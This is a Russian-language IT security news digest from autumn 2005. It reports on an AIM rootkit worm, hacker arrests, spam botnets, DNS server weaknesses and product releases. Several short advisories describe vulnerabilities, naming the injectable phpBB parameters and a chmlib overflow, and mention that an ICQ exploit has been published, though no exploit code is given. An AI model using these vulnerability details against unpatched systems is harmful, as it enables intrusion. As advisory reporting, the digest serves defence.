Червь, распространяемый через AOL Instant Messenger, несет в себе необычайно разрушительный заряд. В пятницу секьюрити-эксперты из компании FaceTime Communications, которая продает продукты для защиты сетей интернет-пейджеров, предупредили, что безымянный червь содержит коктейль из вредоносного ПО, включая так называемый rootkit — хакерский инструмент, который, проникнув в компьютер, прячется от защитного ПО и перехватывает управление системой. Когда пользователь кликает на ссылке, «в машину загружается гремучая смесь», говорит старший технический директор FaceTime Тайлер Уэльс. «Это первый случай, когда мы видим rootkit в составе программ, пересылаемых в машину жертвы. Это очень нехорошая тенденция». Атаки IM-червей и вредоносного кода становятся все интенсивнее. Согласно недавнему отчету IMlogic, в третьем квартале 2005 года число угроз, обнаруживаемых в сетях интернет-пейджеров и пиринговых сетях, выросло по сравнению с тем, что было год назад, на 3295%. Кроме rootkit-файла lockx.exe, новый червь доставляет версию троянского коня Sdbot и целый букет шпионских и рекламных программ, включая 180Solutions, Zango, Freepod Toolbar, MaxSearch, Media Gateway и SearchMiracle. Они поглощают ресурсы системы, замедляя работу компьютера, а также пытаются заблокировать средства защиты и заменяют страницу поиска в веб-браузере. Червь был обнаружен в чат-руме AOL IM и заразил один из ПК, которые FaceTime использует в качестве наживки. Компания утверждает также, что она видела его и в других компьютерах. «Он очень опасен, — говорит Уэльс. — Rootkit устроен так, что его трудно обнаружить, и это особенно пугает».
Подробности

1/11/2005 10:52 Украинская контрразведка поймала телефонного хакера
Сотрудники контрразведки Службы безопасности Украины (СБУ) разоблачили злоумышленника, который в течение определенного времени вмешивался в работу компьютерной сети национального оператора связи "Укртелеком". Как сообщили украинскому интернет-изданию "proUA" в пресс-службе СБУ, злоумышленником оказался студент одного из киевских технических вузов, "который таким образом пытался уменьшить свои расходы на пользование Интернетом". С этой целью, пишет издание, "юноша создал программу, которая в процессе набора модемом телефонного номера провайдера, изменяла номер домашнего телефона на служебный номер АТС "Укртелекома". Таким образом, как сообщается, молодой человек пользовался Интернетом в личных целях за счет компании. Отмечается, что на студента в результате следственных действий вышли контрразведчики СБУ с помощью специалистов "Укртелекома". По факту правонарушения следователями СБУ возбуждено уголовное дело по статье 361 Уголовного кодекса Украины ("несанкционированное вмешательство в работу электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи, которое привело к утечке, потере, подделке, блокированию информации, искажению процесса обработки информации или к нарушению установленного порядка ее маршрутизации").
Источник

31/10/2005 16:42 Blue Gene/L побил собственный рекорд быстродействия
Суперкомпьютер Blue Gene/L, производства корпорации IBM, удвоил собственный рекорд быстродействия. Весной Terralab уже писала о рекорде производительности этого суперкомпьютера. Теперь же, по установке в него всех 65536 процессоров, производительность достигла 280,6 терафлопс по тесту Linpack. Машина IBM в Ливерморской национальной лаборатории Лоуренса официально стала самым мощным компьютером на планете ещё в июне, когда была смонтирована только наполовину. Теперь лаборатория может полностью использовать всю эту колоссальную мощь для моделирования процессов в ядерных боеприпасах без натурных испытаний.
Источник

31/10/2005 13:17 "Телефон доверия" израильских спецслужб взломан хакером
Попытка израильских служб безопасности привлечь палестинских осведомителей для того, чтобы лучше бороться с обстрелами территории Израиля ракетами "Касам", провалилась из-за недостаточной защиты информации и смекалки израильского хакера. Как уже сообщал MIGnews, в субботу над территорией Газы были сброшены листовки с призывом к палестинцам (на арабском языке) сообщать на автоответчик по телефону 054-6912273 о готовящихся боевиками атаках. В частности, в тексте сообщений значилось: "ЦАХАЛ продолжит действовать против террористических организаций до полного прекращения терактов. Чтобы избежать угрозы вашей жизни, не приближайтесь к местам, откуда запускаются ракеты. Вы прекрасно понимаете, какой ущерб наносят обстрелы, которые производятся неподалеку от ваших домов. Эти обстрелы производят безответственные террористы, наносящие ущерб вашей безопасности". В конце обращения содержалась заботливая приписка: "Для вашей безопасности, звоните из мест, где вас никто не знает". Но это предупреждение оказалось излишним. Израильский хакер "взломал" автоответчик, выяснил, что записанные на него сообщения содержат также обратный номер звонившего, после чего изменил код доступа к автоответчику. Он сообщил редакции газеты "Едиот ахронот", что взлома как такового и не было – представители спецслужб не удосужились даже изменить код доступа к автоответчику перед тем, как задействовать линию для столь щекотливой операции. Код был присвоен системой сотовой связи стандартный, "по умолчанию". По словам хакера, он изменил код доступа, чем лишил военных возможности прослушать сообщения. По его словам, он сделал это, чтобы защитить возможных информаторов. "Я боялся, что террористы смогут выяснить личности звонивших и отомстить им", – пояснил он.
Подробности

31/10/2005 12:49 Первый релиз sendmail X
Claus Aßmann объявил о выпуске первого релиза полностью переработанной версии sendmail - sendmail X 0.0.0.0, с форматом файла конфигурации похожим на bind 9, архитектурой напоминающей postfix и лицензией "Sendmail open source license", cообщает opennet.ru.
Подробности

31/10/2005 12:31 Шпионские программы: первый классификатор
Коалиция разработчиков систем защиты от шпионских программ (spyware) и ИТ-гигантов других отраслей, Anti-Spyware Coalition, создала черновой вариант классификатора шпионского кода. В частности, в коалиции решили, как трактовать «рекламное ПО» (adware), которое без ведома пользователя устанавливается в систему и периодически выводит всплывающие окна или перенаправляет на рекламируемый сайт. Участники коалиции решили создать основной термин, «шпионское ПО и другие потенциально нежелательные технологии», а «рекламное ПО» сделать его подразделом. Под главный термин подпадает всё, что нарушает контроль пользователя над системой, в том числе безопасность и конфиденциальность; нарушает использование системных ресурсов, в том числе управление набором программ, установленных на компьютере; и/или собирает, использует и распространяет персональную или другую критичную информацию. Общие термины были опубликованы на обозрение общественности. В частности, коалиция предлагает ввести рейтинги риска — «высокий», «средний» и «низкий». Высокий риск несет код, устанавливающий себя в систему без ведома пользователя, мешающий работе других программ, перехватывающий электронную почту и сообщения интернет-пейджеров и отображающий рекламу без указания названия программ. Средний риск представляет код, изменяющий домашнюю страницу в браузере, а низкий — собирающий куки — данные, оставляемые сайтами на компьютере при посещении. В Anti-Spyware Coalition входят такие компании, как America Online, Computer Associates, Hewlett-Packard, McAfee, Microsoft, Sophos, Symantec, Yahoo! и другие, сообщил Тhe Inquirer.
Источник

31/10/2005 11:57 В phpBB обнаружена уязвимость
Обнаружены уязвимости в попялярном форуме phpBB, которые позволяют удаленному пользователю произвести XSS-нападение, выполнить произвольные SQL-команды в базе данных приложения и выполнить произвольный PHP-код на целевой системе. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре error_msg сценария usercp_register.php, параметре forward_page сценария login.php и параметре list_cat сценария search.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML-сценарий в браузере жертвы в контексте безопасности уязвимого сайта. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре signature_bbcode_uid сценария usercp_register.php и может быть эксплуатирована посредством вставки произвольных выражений типа field=xxx в запрос. Уязвимость существует при выключенной опции magic_quotes_gpc. Уязвимость обнаружена при обработке входных данных в параметре signature_bbcode_uid сценария usercp_register.php. Удаленный пользователь может изменить значения, которые передаются в функцию preg_replace() и выполнить произвольный PHP-код на целевой системе. Уязвимы версии до phpBB 2.0.17 включительно. Рекомендуется обновиться до вышедшей 2.0.18.
Описание

31/10/2005 11:33 Microsoft ведет охоту на владельцев бот-сетей
Microsoft утверждает, что она проследила, куда ведут нити от гигантских сетей компьютеров-зомби, рассылающих горы спама. В надежде обуздать волну спама, Microsoft подала судебные иски против тех, кто захватывает ПК, чтобы рассылать миллионы непрошеных сообщений. На прошлой неделе компания заявила, что она установила 13 источников спама, которые пользуются такими зомби, и в августе подала на эти организации в суд. С тех пор Microsoft установила личности некоторых стоящих за ними людей. «Мы идентифицировали ряд организаций в Северной Америке, которые, по нашему мнению, виновны в распространении спама» — сказал директор Microsoft по программам обеспечения интернет-безопасности Тим Крэнтон (Tim Cranton). В ходе своего расследования Microsoft специально создала зомбированный компьютер. За три недели к нему дистанционно обратились 5 млн раз и пытались использовать для рассылки 18 млн спам-сообщений, рекламирующих свыше 13 тыс. веб-сайтов, сообщил Крэнтон. Microsoft блокировала весь этот мусор перед выходом в интернет. «Мы были ошеломлены, — сказал Крэнтон. — Мы не ожидали таких огромных цифр и были поражены объемом спама, проходящим всего через один зомбированный ПК». После этого эксперимента Microsoft проанализировала трафик зомби и рассылаемые им сообщения, а затем сопоставила с другими сообщениями, поступающими на адреса Hotmail. Результаты приложены к судебному иску. В этом году Федеральная торговая комиссия США (FTC) призвала компьютерную индустрию к совместным действиям против зомби, которые стали серьезной проблемой. Microsoft убеждена, что зомби рассылают свыше половины всего спама. FTC начала операцию Spam Zombie и попросила сервис-провайдеров изолировать зомби и помогать пользователям в очистке своих ПК.
Подробности

31/10/2005 11:15 Visual Studio 2005 уже поставляется
База данных SQL Server 2005 и инструменты Visual Studio 2005, официальный выпуск которых планируется на ноябрь, уже доступны для членов MSDN. В четверг Microsoft выпустила долгожданные обновления своей базы данных и инструментов программирования и обнародовала план по привлечению новых заказчиков СУБД. Компания сообщила, что ее продукты SQL Server 2005 и Visual Studio 2005 уже доступны подписчикам Microsoft Developer Network. В тот же день эти два продукта были запущены в производство и поступят в продажу 7 ноября. В четверг Microsoft объявила также временные «миграционные цены» для привлечения заказчиков конкурирующих продуктов. Заказчикам СУБД Oracle, Sybase и IBM (DB2 и Informix) Microsoft предоставит 50%-ю скидку на лицензии SQL Server Enterprise Edition относительно обычных цен по программе Software Assurance License. Предложение начинает действовать с 1 декабря.
Подробнее

31/10/2005 10:52 На F-15 впервые с 1988 года поменяют процессоры и операционную систему
Американские истребители F-15E Strike Eagle подвергнутся модернизации. В рамках этой программы у них будут замены бортовые компьютеры, сообщает Spacewar.com. В первую очередь, на самолетах будет установлен новый центральный процессор. Кроме того, что новый компьютер будет обрабатывать информацию в несколько раз быстрее, он также изменит некоторые характеристики самолета, в частности - позволит ему нести более совершенное оружие. Модернизация начнется 30 сентября 2006 года, а последняя партия самолетов покинет ангары в сентябре 2010 года. Координатором этой программы выступает Группа систем F-15 (F-15 Systems Group) Центра авиационных систем (Aeronautical Systems Center) ВВС США. Новый процессор сменит аппаратуру, которая устанавливалась на истребители с 1988 года. С тех пор электронное оборудование уже окончательно устарело, и не может обслуживать новейшие системы вооружений, включая "умные" бомбы и ракеты. Кроме того, новый бортовой компьютер позволит адаптировать для F-15 новейшие разработки в области вооружений еще на стадии их проектирования. Он также увеличит число целей, которые истребитель сможет сопровождать одновременно. Таким образом F-15 будет отвечать последним требованиям ВВС США, которые делают ставку на многофункциональные истребители. Теперь компьютер позволит без специального перепрограммирования выполнять задачи по перехвату воздушных целей (включая баллистические ракеты), ближнему бою, разведке, целеуказанию, поддержке наземных боевых и спасательных операций. Кроме нового бортового компьютера, F-15 также получит современное оборудование для кабины пилота. Оно будет включать в себя новейший дисплей. Программное обеспечение также будет серьезно обновлено.
Подробности

30/10/2005 13:48 Уязвимость в библиотеке chmlib
iDefense сообщает о наличии уязвимости в библиотеке chmlib, которой оснащаются многие ОС с открытым исходным кодом (в частности, Linux и FreeBSD). Библиотека предназначена для просмотра файлов формата CHM, который часто применяется в файлах помощи Windows-систем. Уязвимость связана с отсутствием проверки данных, копируемых в память при обработке CHM-файла. В результате переменная _chm_parse_cword может превысить количество памяти, выделяемой переменной CHM_MAX_PATHLEN, которая записывается в буфер и, в результате код возврата может быть переписан. Соответственно, сформировав специальный CHM-файл, можно выполнить произвольный код в системе с полномочиями пользователя, от имени которого запускается просмотр файла. Выпущена обновлённая версия библиотеки chmlib-0.36, в которой уязвимость устранена.
Описание

30/10/2005 13:25 Эксплоит уязвимости ICQ 2003a
Опубликован эксплоит уязвимости популярного IM Mirabilis ICQ Pro 2003a (испытывались билды #3800, #3728 в ОС Win XP Pro Sp2). Эксплоит использует уязвимость в ICQ, позволяющую вызвать переполнение буфера с запуском шелл-кода. Собственно, в самом исходнике приведены подробные инструкции по использованию уязвимости и отмечается, что для проведения атаки необходима социальная инженерия.
Эксплоит

30/10/2005 13:02 IMEI надо будет считать и учитывать
Законодатели намерены обязать сотовых операторов информировать правоохранительные органы о случаях регистрации в сети похищенных телефонов — создание базы идентификационных номеров ворованных трубок сейчас параллельно обсуждают в Государственной думе и Московской городской думе. Эту базу, по мнению силовиков, можно использовать и для борьбы с нелегальным импортом трубок. Но операторы считают, что на них пытаются возложить поиск преступников, и говорят о будущих многомиллионных убытках.
Источник

30/10/2005 12:59 Релиз FreeBSD 6.0 почти готов
Scott Long сообщил о завершении тестирования FreeBSD 6.0-RC1, сообщает opennet.ru. Финальный релиз FreeBSD 6.0 планируется выпустить к концу выходных либо в начале следующей недели. Scott просит всех у кого есть возможность обновить свои системы до RELENG_6_0, чтобы провести последнее тестирование перед релизом.
Подробности

30/10/2005 12:36 Использование технологий аутентификации - необходимое условие членства в DMA
Новые правила, принятые Direct Marketing Association (DMA), требуют, чтобы все члены Ассоциации использовали технологии аутентификации электронных сообщений, сообщают Associated Press и сайт BtoBOnline. Руководство DMA считает, что это необходимое условие для предотвращения мошенничества с использованием электронных писем. Активная борьба со спамом приводит к тому, что зачастую блокируются не только незапрошенные, но и легитимные рассылки. По некоторым данным, одна из четырех легитимных рассылок не доходит до адресатов. Основные технологии аутентификации, которые в настоящее время используются, это Sender ID Framework, объединяющая технологию Microsoft Sender ID и SPF Мена Вонга, и DomainKeys Identified Mail (DKIM) — комбинация решений DomainKeys от Yahoo и разработки Cisco Identified Internet Mail. Sender ID Framework и DKIM могут помочь ISP идентифицировать добросовестных отправителей и блокировать спамеров, которые предпочитают подставлять фальшивые обратные адреса. Тот факт, что спамеры тоже используют технологии аутентификации, DMA не смущает. По словам представителя Ассоциации, аутентификация лишит спамеров возможности маскироваться, и они будут вынуждены выйти из подполья.
Источник

30/10/2005 12:01 Выход NetBSD 2.1
После выхода предыдущей версии NetBSD прошло 6 месяцев и 19 дней, и вот накануне разработчики выложили версию 2.1 на FTP-сервер проекта. Желающие могут ознакомиться с изменениями и скачать образы ОС.
Изменения
Образы ОС

30/10/2005 11:30 Sun приступила к сертификации Solaris 10
Sun Microsystems начала сертификацию ОС Solaris 10 согласно требованиям Common Criteria на уровне 4+ (Evaluation Assurance Level, EAL), который признан во всем мире наивысшим универсальным уровнем сертификации ОС. Программа сертификации включает все компоненты корпоративного класса, позволяющие гарантировать коммерческим и государственным организациям высокую защищенность ОС. Входящие в стандарт профили защиты (Protection Profiles) и уровни гарантии соответствия согласованы и приняты представителями более 22 стран мира в качестве необходимых условий внедрения конкретных технологий в средах с особо высокими требованиями к безопасности. По словам представителей корпорации, тестирование ОС будет проводится в Канаде компанией CGI Information Systems and Management Consultants на разных платформах, в том числе на системах, созданных на базе процессоров Sparc и системах с 64-разрядной архитектурой x86 на базе процессоров AMD Opteron. Завершить сертификацию планируется в следующем году.
"Открытые системы"

30/10/2005 11:18 Треть пользователей США боятся интернета
Рост числа случаев заражения компьютеров и кражи реквизитов с использованием интернета пугает пользователей. Треть интернет-аудитории США старается пореже выходить в полную опасностей Сеть, а четверть прекратили делать онлайновые покупки. Такие данные были получены социологами Consumer Reports WebWatch в ходе случайного телефонного опроса 1501 совершеннолетнего пользователя (от 18 лет) с 19 мая по 21 июня. 80% респондентов озабочены мыслью о том, что у них могут украсть реквизиты, 53% перестали указывать в интернете персональную информацию. Среди тех, кто по-прежнему продолжает делать онлайновые покупки, 54% сначала читают политику компании по отношению к их персональным данным, а 29% опрошенных стали покупать в интернете реже. Погрешность опроса, по утверждению авторов, не превышает 3%, пишет AP.
Источник

30/10/2005 10:42 Три румына два года воровали деньги у британских пользователей eBay
Британские власти приговорили к тюремному заключению троих мошенников румынского происхождения, которые занимались похищением денег через онлайновый аукцион eBay. Преступники под разными именами два года выставляли на аукционе вымышленные лоты и получали за них авансы, ничего не высылая покупателям. Периодически они также предлагали продать аналогичные вещи покупателям, не выигравшим торги, и получали авансы и от них. Таким образом группа заработала, по оценкам полиции, около 300 тысяч фунтов. Банда получала деньги через системы денежных переводов, сотрудники одной из них и заподозрили мошенничество, сообщив в полицию. Лидер группы 30-летний Николае Кретану (Nicolae Cretanu), житель Лондона, получил 3,5 года тюрьмы, помогавшая ему жена 23-летняя Адриана и сообщник 26-летний Георге Титар (George Titar), также лондонцы, получили по 2,5 года лишения свободы. Следствие установило, что большую часть денег группа переправляла в Румынию, где у них имелись другие сообщники. Полиция полагает, что осужденные были ячейкой более масштабной сети, которая продолжает действовать. Число пострадавших, по полицейским оценкам, составляет около 3 тысяч человек.
Источник

29/10/2005 13:07 Проект OpenTopia
Довольно интересный и полезный сайт проекта OpenTopia предлагает свои посетителям онлайновую энциклопедию, 1279 online–вебкамер по всей планете, интерактивная карта солнечного света , различные калькуляторы, электронные версии мировых газет и многое другое. Думается, этот сайт будет полезен посетителям нашего сайта.
Сайт проекта

29/10/2005 12:10 Фирменный магазин Apple теперь и в России
Как сообщает Tom's Guides Publishing, в ноябре на первом этаже торгового центра "Атриум" на Курской (Садовое кольцо, м. Курская) начнёт работать фирменный магазин Apple. Открытие такого "бутика" является знаковым событием для Apple в России, и обусловлено, прежде всего, постоянно растущим интересом к продукции Apple в стране. Фирменные магазины Apple давно и успешно существуют во всем мире, и неизменно пользуются огромной популярностью среди покупателей. Так, при открытии Apple Store в Токио интерес публики к этому событию был настолько велик, что очередь, образовавшаяся у входа, стала самой длинной за всю историю и вошла в Книгу Рекордов Гиннеса. В Apple Center будет представлена полная линейка продукции Apple - компьютеры, ноутбуки, программное обеспечение, периферийные устройства, а также вся линейка музыкальных плееров iPod и широчайший ассортимент аксессуаров к ним. Apple подчёркивает, что оформление Apple Center в "Атриуме" полностью соответствует мировым стандартам: это просторное светлое помещение с оригинальным современным интерьером. В магазине будет оборудована удобная торговая зона, где клиенты смогут сделать покупки и узнать всё о новейших решениях Apple и отдельное пространство для демонстрации технических возможностей продукции Apple.
Подробнее

29/10/2005 11:39 В Великобритании открыт "ликбез" по сетевой безопасности
В Великобритании началась кампания "Оставайтесь в безопасности в онлайне" по предупреждению пользователей интернета об угрозах. Инициаторы кампании – правительство, киберполиция ("Национальное подразделение высокотехнологичных преступлений") и компании, среди которых HSBC, eBay и Microsoft. На презентации в Лондоне участники сообщили об открытии специального веб-сайта Getsafeonline.com. Поводом для начала кампании стали результаты исследования, в ходе которого выяснилось, что 83% британцев, пользующихся интернетом, не осведомлены о способах самозащиты в Сети. Почти половина пользователей следует в этом вопросе совету друзей и членов семьи, не обращаясь к информации от специалистов.
Сайт проекта

29/10/2005 11:15 В России появился свой Skype
В России появился сервис, аналогичный западному Skype. Новая сеть Sipnet позволяет абонентам звонить с компьютера на компьютер, с компьютера на мобильный или стационарный телефоны и наоборот. Компания Tario объявила об открытии публичного доступа к сайту новой абонентской сети Sipnet. Новая сеть строится в соответствии с новой концепцией организации сетей связи — NGN (Next Generation Networking), в которых абонентам предоставляются такие услуги, как почтовая система, мгновенные сообщения, персонализация и контроль присутствия. Кроме того, в сети присутствуют расширенные голосовые сервисы: голосовая почта, автоответчики, многосторонние аудиоконференции, голосовые чаты, системы интеллектуальных голосовых меню, аудио-e-mail и многое другое. Среди главных преимуществ новой телефонной сети — альтернативная нумерация, при которой каждый абонент становится владельцем персонального сетевого телефонного номера — SIP ID, являющегося единым идентификатором абонента в любой точке мира. В отличие от обычного телефонного номера, этот абонентский номер не зависит городских телефонных сетей, междугородних и международных линий связи и будет работать в любом месте. На SIP ID уже сегодня можно бесплатно позвонить из более чем 70-ти городов России, СНГ и мира. Звонки из этих городов осуществляются через местные телефонные номера коллективного доступа с дополнительным набором сетевого телефонного номера.
Подробности на сайте

29/10/2005 10:52 Аппаратный антивирус от ZyXel и Лаборатории Касперского
"Лаборатория Касперского" и компания ZyXEL Communications провели 25 октября совместную пресс-конференцию, посвященную первым итогам соглашения об использовании технологий антивирусной фильтрации "Лаборатории Касперского" в межсетевых экранах ZyWALL. В конференции участвовали Александр Семенов, председатель совета директоров ZyXEL по СНГ и Юго-Восточной Европе, Виталий Безродных, директор по развитию бизнеса "Лаборатории Касперского", Максим Медведев, директор по продукции ZyXEL Россия, и Петр Меркулов, менеджер по продажам технологических решений "Лаборатории Касперского". Принципиальным отличием новой технологии является возможность обработки всего трафика, проходящего через межсетевой экран ZyWALL UTM, "на лету", в режиме реального времени, без предварительной загрузки файлов в оперативную память устройства. Обнаружение вирусов осуществляется на уровне IP-пакетов, с помощью алгоритма потокового сканирования и специализированной микросхемы SecuASIC, разработанной компанией ZyXEL для оптимальной реализации этого алгоритма. Решение предоставляет антивирусную защиту первого уровня и позволяет остановить наиболее опасные и распространенные вирусы еще до их проникновения в локальную сеть. По оценкам Александра Семенова, это позволяет снизить вероятность вирусного заражения в 20 раз.
Подробнее

29/10/2005 10:48 Agava Firewall получил сертификат
Agava (ООО «Агава», Долгопрудный, Москвовская область) сообщила о том, что редакция PC Magazine/Russian Edition подвела итоги обзора «Россия: прикладное ПО 2005». Целью обзора было составить общую картину российского софтверного рынка. Как информирует Agava, традиционно рынок принято оценивать по деятельности нескольких именитых игроков, в то время как в России — по разным оценкам — насчитывается до 10 000 компаний, профессионально разрабатывающих ПО. Достижения этих компаний не так заметны, хотя созданные ими продукты, зачастую, решают поставленные задачи даже более успешно, чем широко известные аналоги. Результаты обзора предполагают облегчить пользователю поиск полезных утилит и пакетов. Одной из находок обзора в номинации «Интернеткоммуникации» стал продукт компании — Agava Firewall. Программа представляет собой персональный брандмауэр, обеспечивающий контроль над сетевой активностью ПК. По мнению экспертов PC Magazine, «существенное преимущество этого пакета — надежность и простота использования». Файрвол блокирует внешние атаки, утечку информации, несанкционированные запуски приложений на пользовательской машине. Ключевая особенность пакета заключается в мощной низкоуровневой защите ТСР-стека и защите от ARP-атак. Специальные инструменты позволяют фильтровать электронную почту (исключается случайный запуск опасных приложений) и содержимое скачиваемых страниц (отключается скачивание графической рекламы и Flash-роликов, блокируются всплывающие окна). Agava Firewall получил сертификат Best soft 2005.
Подробности

29/10/2005 10:34 IBM обновила Gluecode, переименовала его в WAS CE
Корпорация IBM выпустила обновленный и переукомплектованный сервер приложений Gluecode. Это произошло впервые после приобретения его разработчика с одноименным названием. Возможно, продукт позволит IBM усилить свои позиции на рынке систем с открытым кодом. В Gluecode добавлен базовый код Apache Geronimo M5, что означает сертифицированную поддержку Java 2 Enterprise Edition (J2EE) 1.4. Geronimo -- основа с открытым кодом для Gluecode. Среди прочих возможностей -- IBM Java Runtime Edition (JRE), встраиваемая версия СУБД Cloudscape и обновленный набор драйверов баз данных. IBM также провела ребрэндинг Gluecode -- теперь он называется WebSphere Application Server Community Edition (WAS CE). Gluecode - это небольшой - 60 МБ - cервер приложений Java. Он доступен для свободной загрузки с сайта IBM. WAS SE будет окупаться за счет поддержки -- $900 в год с одного сервера.
Подробности

29/10/2005 09:50 Microsoft пригрозила отозвать Windows из Южной Кореи
Корпорация Microsoft заявила, что антимонопольное расследование, которое в ее отношении сейчас проводят власти Южной Кореи, может привести к выводу с рынка этой страны операционной системы Windows или к задержкам выхода новых ее версий, сообщает Associated Press. Расследование недавно начала южнокорейская Комиссия по свободной конкуренции, она подозревает крупнейшую софтверную компанию мира в том же, в чем она подозревалась в США и Европе - в создании необоснованных конкурентных преимуществ путем встраивания в Windows дополнительных сервисов собственного производства. По данным агентства, комиссия изучает, не нарушают ли местное антимонопольное законодательство интернет-пейджер MSN Messenger и технологии трансляции потокового звука и видео. Microsoft заявляет, что корейская комиссия может потребовать убрать некоторые компоненты ОС или переделать ее специально для корейского рынка. В этом случае корпорация и обещает возможный вывод Windows с рынка.
Подробности

28/10/2005 11:10 Система паролей Oracle подверглась критике
Из-за слабого механизма защиты злоумышленники могут легко подобрать пароли пользователей базы данных Oraclе, что ставит под удар корпоративные данные, предупреждают эксперты. Они критикуют методы защиты Oracle, призывая производителя ПО усовершенствовать механизм, применяемый для обеспечения безопасности паролей пользователей базы данных. Исследователи обнаружили способ вскрытия plain text-паролей за считанные минуты, даже если они очень длинные и составлены правильно. Метод, используемый Oracle для хранения и шифрования паролей пользователей, не обеспечивает достаточной безопасности, утверждают Джошуа Райт из SANS Institute и Карлос Кид из Royal Holloway College при Лондонском университете. В среду Райт продемонстрировал это на конференции SANS Network Security в Лос-Анджелесе. В своей презентации Райт рассказал, как шифруются пароли перед сохранением в базе данных Oracle, и представил написанный им инструмент для их расшифровки. С работой Райта и Кида можно ознакомиться на веб-сайте SANS.
Документ в PDF

28/10/2005 10:54 Microsoft отругали в суде за странное предложение некомпетентного сотрудника
В федеральном суде в Вашингтоне была рассмотрена претензия ряда участников высокотехнологичного рынка к компании Microsoft. Предметом разбирательства стало недавнее предложение Microsoft в адрес производителей портативных цифровых плейеров - компания заявила, что хотела бы, чтобы те устройства, которые поддерживают форматы хранения данных от Microsoft, не поддерживали бы никаких других форматов. Как сообщает Associated Press, в ходе заседания судья Коллин Коллар-Котелли (Colleen Kollar-Kotelly), которая занималась значительной частью разбирательств по антимонопольному процессу, даже повысила голос и потребовала от адвокатов Microsoft объяснений столь странному с ее точки зрения требованию. "Такого быть не должно", - приводит ее слова агентство. Эксперты отмечают, что предложение компании является ничем иным, как попыткой нарушить одобренные сторонами в 2002 году условия соглашений по антитрастовому иску. Associated Press подчеркивает, что Microsoft сама отказалась от своего предложения через 10 дней после его озвучивания, тем не менее, судебное заседание все равно состоялось. Одним из вопросов его повестки был анализ того, насколько корректно Microsoft выполняет условия урегулирования (требования к поведению компании на рынке расписаны до 2007 года).
Подробности

28/10/2005 00:12 C Днём Рождения, дядя Билли!
Сегодня Биллу Гейтсу (он же - Уильям Генри Гейтс III), главе корпорации Microsoft, исполняется 50 лет! С чем мы все его и поздравляем! Хотелось бы ему подарить всё то, что есть у нас, в надежде, что на наш День Рождения он совершит аналогичный поступок!
Вехи славного пути именниника

27/10/2005 17:12 84% DNS серверов уязвимы к различным видам атак
Многие серверы DNS (а их в интернете около 7,5 млн) неправильно сконфигурированы или работают на старых версиях ПО, что делает их уязвимыми для внешних атак. Такие выводы опубликованы в новом отчете компании The Measurement Factory. По результатам исследования выяснилось, например, что на каждом пятом сервере установлена не 9-я, а более ранняя версия программы BIND. Такие серверы, фактически, оставляют «открытую калитку» для доступа к кэшу DNS, и эту возможность используют хакеры, подменяя учетные записи во время фишинга.
BIND 9.3, 9.2, 9.1 — 57%.
BIND 8.3, 8.2, 8.1 — 20%.
Windows 2000 — 6,5%.
Windows 2003 — 3,5%.
Другие — 13%.
Как видим, только на 57% серверов DNS установлена последняя, самая защищенная версия BIND 9.X. Но даже в этом случае нет гарантии, что DNS-сервер правильно сконфигурирован. Исследование также выявило, что около 75% всех DNS-серверов в интернете, то есть примерно 1,3 млн, разрешают перенаправление DNS-запросов при запросах с любого IP-адреса. На самом деле эта функция должна быть разрешена только для списка известных IP, с которых поступает запрос, иначе злоумышленники получают возможность проводить DoS атаки и подменять содержимое записей (cache poisoning). Более 40% серверов поддерживают функцию «передачи зоны» для запросов с любых IP-адресов. Функция «передачи зоны» (zone transfer) выполняет копирование целого списка IP-адресов, принадлежащих организации, с одного DNS-сервера на другой. Это тоже дает возможность проводить атаки типа DoS и дает злоумышленникам информацию о внутренних сетях. В общей сложности незащищенными признаны до 84% всех серверов в системе DNS. Они уязвимы для той или иной атаки.
Отчёт

27/10/2005 13:43 Еще одно пособие по взлому
Издательство «АйТи-Пресс» выпустило книгу Кевина Митника «Искусство вторжения», в которой читатель может ознакомиться с многочисленными примерами уязвимости информационных систем. В книге изложены реальные истории, которые, несмотря на развитие методов информационной безопасности, являются примерами того, что хакеры постоянно находят все новые средства взломов применяемых средств защиты. Содержание книги позволяет профессионалам в области информационных систем ознакомиться с конкретными фактами деятельности хакеров и использовать полученные сведения для совершенствования средств защиты. Стоит это удовольствие 299 рублей.
О книге

27/10/2005 13:11 Руководство по оптимизации PHP
Кузьма Феськов перевел отличное руководство по оптимизации mod_php, сообщает opennet.ru. В документе рассказано каким образом работает PHP относительно других компонентов web-сервера, затронута тема выявления узких мест и вопросы оптимизации PHP скриптов
Статья

27/10/2005 12:28 Спамеры на службе у экстремистов?
Утром 22 октября пользователи электронной почты обнаружили в своих почтовых ящиках спам, целью которого является не привычная уже реклама товаров и услуг, а формирование общественного мнения и привлечение внимания к «горячим» политическим новостям. За последние 10 дней это уже третья атака, целью которой является привлечение внимания к событиям в Нальчике и небезызвестному сайту «Кавказ-центр», который российские спецслужбы нередко называют рупором международного терроризма. Если в первых двух атаках рассылалась информация от имени «Кавказ-центра», то последняя атака маскируется под предупреждение о незаконном использовании адреса пользователя и не содержит никаких намеков на политическую окраску. Тема сообщения варьируется, чаще всего встречается такой вариант: «Your e-mail located on this site». Текст, как правило, выглядит следующим образом: «Hello, For more information about how somebody using your e-mail address, click here: ... {LINK}». Вариации текста встречаются, но они незначительные. При переходе по ссылке пользователь путем нескольких редиректов попадает на сайт «Кавказ-центра». Для проведения рассылки спамеры использовали то же программное обеспечение, которое обычно применяется для распространения вредоносных программ — вирусов и троянцев. Это ПО подставляет в сообщение фальшивые заголовки и генерирует текст письма с учетом доменного имени, на который в данный момент идет рассылка.
Источник

27/10/2005 12:06 Птичий грипп: прикрытие для компьютерных вирусов
Антивирусная лаборатория компании Panda Software зафиксировала появление новой угрозы - троянце Naiva.A. Этот вредоносный код проникает на компьютеры в документе Word, содержащем информацию об эпидемии птичьего гриппа. Первая строка документа - Outbreak in North America или What is avian influenza (bird flu)? ("Вспышка в Северной Америке" или "Что такое птичий грипп?"). Троянец использует два макроса Word для внедрения и запуска на компьютере второй угрозы. Первый макрос вызывает пять функций ядра, которые позволяют троянцу изменять, создавать и удалять файлы. Второй макрос устанавливает на компьютер вредоносный код Ranky.FY, который встроен в документ и позволяет потенциальному злоумышленнику получать удаленный контроль над зараженным компьютером. Для защиты от этой угрозы пользователям следует убедиться, что защита от макросов установлена на средний (чтобы получать предупреждение при их запуске) или же высокий уровень (чтобы блокировать их запуск). Если уровень защиты от макросов ниже этих уровней, троянец будет установлен на компьютер при открытии пользователем документа.
Источник

